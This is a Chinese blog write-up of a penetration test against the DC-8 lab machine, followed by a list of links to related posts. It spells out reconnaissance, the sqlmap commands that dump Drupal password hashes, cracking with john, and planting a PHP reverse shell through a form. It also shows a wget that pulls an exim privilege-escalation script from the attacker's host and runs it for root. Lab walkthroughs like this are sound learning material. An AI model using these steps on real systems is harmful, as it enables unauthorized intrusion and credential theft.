DC-8 渗透测试

冲冲冲 ,好好学习 。 核心:cms上传添加存在漏洞组件,利用该组件getshell

操作机:kali 172.66.66.129

靶机:DC-4 172.66.66.137

网络模式:NAT

netdiscover

nmap -sV -A -p- 172.66.66.137 -oN dc-8.nmap

开了22端口ssh 7.4,80端口http

robots.txt 看看

dirb http://172.66.66.137 | grep CODE:2

dirb http://172.66.66.137 > /tmp/dc-8.dirb

只看能访问成功的页面,也可以所有结果输出到文本里保存起来慢慢分析。

有感觉到靶机的难度在提升,加油冲冲冲

先去访问80看看,发现cms是Drupal 7



直觉告诉我,这个url 存在注入点?

url输入单引号 ' 有报错回显而且泄露路径,可以sqlmap跑起来。

sqlmap -u http://172.66.66.137?/nid=1

存在漏洞,爆破吧(不想手工来了>..<)

sqlmap -u http://172.66.66.137/?nid=1 --dbs

sqlmap -u http://172.66.66.137/?nid=1 -D d7db --tables

sqlmap -u http://172.66.66.137/?nid=1 -D d7db -T users --columns

sqlmap -u http://172.66.66.137/?nid=1 -D d7db -T users -C name,pass,uid --dump

name pass uid
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 1
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF 2

保存密码到dc-8.txt,再kali下john爆破一下, john dc-8.txt

turtle

尝试登陆

admin:turtle ; john:turtle发现john是可以的

searchsploit drupal 7

查到/usr/share/exploitdb/exploits/php/webapps/34992.py,能添加admin账号

没有该漏洞,搞了个寂寞... (还有个ssh爆破没尝试)

john账号登进去之后的内容就太丰富了。

看到有留言板,马上想到XSS。

我们的目标是:想办法拿到shell,先想到反弹shell,反弹shell的前提是,得找到有地方可以上传并解析代码的位置。

留言板尝试无果,

发现有个可以 edit ,可以编辑代码?点开看看,貌似可以插入个php反弹shell

添加完仿佛没效果?是没有解析吗?

一顿操作下来,发现了这个页面,编辑文本格式里找到了 php code ,狂喜 (>-<)

菜鸡落泪,步骤的第一步就错了,不应该一上来就写反弹shell,得先测试一下这里输入的php代码时候可以被正确的执行,并且回显。测试php 编码是否能执行,写个 <?php phpinfo();?>之类的。

有没有发现,写进去了,讲道理,写进去的php,一般是解析执行了的,但是要访问哪个路径才能看到写进去的内容呢?(打开什么路径触发?)这是个大问题。大问题大问题,为啥没显示出来?编辑还没提交吗?

果然是提交的问题,上面的步骤不完整,每一个都填写,还要添加

最后起作用的好像是这个图的框里,点击submit之后,shell上线。不不不,最后起作用的不是这个框,是上图的form sitting

拿到个陌生shell,开始收集信息。uname -a 、echo $SHELL 、echo $PATH、find / -perm -4000 -type f 2>/dev/null ...

令人兴奋的权限,查看一下内容是啥

4.89版本的exim ,找一下漏洞

上面的txt大多是漏洞验证之类的文档,当然也可以研究可以。要是有 可执行的提权脚本就更爽了。

盯住 privilege escalation 字眼,46994.sh仿佛在向你招手。本地提权,得把脚本传到靶机。

kali开启服务器python -m SimpleHTTPServer 9876

靶机下载脚本 wget http://172.66.66.129:9876/46996.sh

kali下记得执行以下 dos2unix 46996.sh 改一下文本格式

执行(脚本改名为 dc-8.sh了)



没成功,再回去仔细看看脚本源码

有两种利用方法, suid 、netcat

这个shell 效果很玄学,执行了七八次,最后是用netcat才成功了。

最后

  1. 好好学英语
  2. 英语好好学
  3. 学好英语好
  4. 核心在:寻找cms可执行代码的模块/组件,利用来反弹shell。shell代码不一定能执行成功,多研究一下。
  5. 真的得沉得住气,坚持,有耐心,反复尝试反复尝试仿佛尝试
  6. Exim是一个MTAMail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统。通常该软件会与Dovecot或Courier等软件搭配使用。
  7. .rb文件格式是Ruby创建的程序源代码,Ruby是一种为简单快捷的面向对象编程而创建的脚本语言,通过Ruby来编译运行。

DC-8 靶机渗透测试的更多相关文章

  1. DC-1 靶机渗透测试

    DC-1靶机渗透测试 对着镜子大喊三声"太菜了""太菜了""太菜了" DC系列靶机的第一篇.边学习边日靶机边进步,摸爬滚打着前行. 内容不只 ...

  2. DC-5 靶机渗透测试

    DC-5 靶机渗透测试 冲冲冲,好好学习 .核心:footer 文件包含漏洞,wfuzz .收获总结写在文末. 谨记任务:找地方上传shell---> root. 操作机:kali 172.66 ...

  3. DC-2 靶机渗透测试

    DC-2 靶机渗透测试 冲冲冲,好好学习. 本靶机核心内容"受限shell提权",知识点在另一篇文章中总结归纳了. 攻击机:kali 靶 机:DC-2 准备:在使用前需要在操作机的 ...

  4. DC-9 靶机渗透测试

    DC-9 渗透测试 冲冲冲,好好学习 DC系列的9个靶机做完了,对渗透流程基本掌握,但是实战中出现的情况千千万万,需要用到的知识面太广了,学不可以已. 靶机IP: 172.66.66.139 kali ...

  5. DC-7 靶机渗透测试

    DC-7 渗透测试 冲冲冲,好好学习 .对管道符的理解加深了好多.最后提权时,遇到了点麻烦.想不懂一条命令为啥能执行生效,耗了一整天才算解决掉. 操作机:kali 172.66.66.129 靶机:D ...

  6. DC-6 靶机渗透测试

    DC-6 渗透测试 冲冲冲,好好学习 . 收获总结写在文末. 操作机:kali 172.66.66.129 靶机:DC-4 172.66.66.136 网络模式:NAT 上来一波 netdiscove ...

  7. DC-4 靶机渗透测试

    DC-4 渗透测试 冲冲冲,努力学习 .掌握 hydra ,nc反弹shell 记住你要干嘛, 找地方上传shell(大多以后台登录为切入点,再反弹shell),shell提权到root 操作机:ka ...

  8. DC 1-3 靶机渗透

    DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...

  9. vulnhub-DC:7靶机渗透记录

    准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...

随机推荐

  1. 机械革命z2安装ubuntu20

    为了性能买了个游戏本机械革命z2,但还是想用上linux,身为程序员习惯了linux的开发环境有点离不开.但是之前尝试安装deepin或者linux都失败了,一是N卡条件下安装过程和安装之后的显示有问 ...

  2. 数据同步Datax与Datax_web的部署以及使用说明

    一.DataX3.0概述 DataX 是一个异构数据源离线同步工具,致力于实现包括关系型数据库(MySQL.Oracle等).HDFS.Hive.ODPS.HBase.FTP等各种异构数据源之间稳定高 ...

  3. 『心善渊』Selenium3.0基础 — 12、Selenium操作鼠标和键盘事件

    目录 (一)对鼠标的操作 1.鼠标事件介绍 2.ActionChains 类鼠标操作的常用方法 3.perform()方法 4.鼠标事件操作步骤 5.示例 (1)右键单击.左键双击 (2)鼠标拖拽动作 ...

  4. AIDL —— Android接口定义语言

    AIDL:Android Interface Definition Language,即Android接口定义语言,是Android进程间通信比较常用的一种方式.翻译一下,就是为了让某个Service ...

  5. 4.5 RNN循环神经网络(recurrent neural network)

     自己开发了一个股票智能分析软件,功能很强大,需要的点击下面的链接获取: https://www.cnblogs.com/bclshuai/p/11380657.html 1.1  RNN循环神经网络 ...

  6. 『无为则无心』Python序列 — 22、Python集合及其常用操作

    目录 1.Python集合特点 2.Python集合的创建 3.操作集合常用API (1)增加数据 @1.add()方法 @2.update()方法 (2)删除数据 @1.remove()方法 @2. ...

  7. 如何在微信小程序中使用组件?

    何为组件 组件封装一段代码,不仅可以在其他的页面中可以使用,也可以在本页面中使用,不用再重复造"轮子".组件可以提高代码的复用率,因此善于使用组件在微信小程序开发中是非常重要的. ...

  8. 使用RSA和DES保护的Socket通信

    基本要求:将DES加密算法应用于网络通信,使用RSA算法自动分配密钥,设计好界面,可验证自动生成的密钥和加解密正确的结果. 具体实现要求:客户端和服务器建立连接后,客户端生成一个随机DES密钥;服务器 ...

  9. SpringBoot集成websocket发送后台日志到前台页面

    业务需求 后台为一个采集系统,需要将采集过程中产生的日志实时发送到前台页面展示,以便了解采集过程. 技能点 SpringBoot 2.x websocket logback thymeleaf Rab ...

  10. hadoop安装前的准备

    1.操作系统安装 2.hostname设定 3.hosts文件设定 4.ssh免密码登录 5.NTP时间同步设定 6.iptables永久关闭 7.selinux永久关闭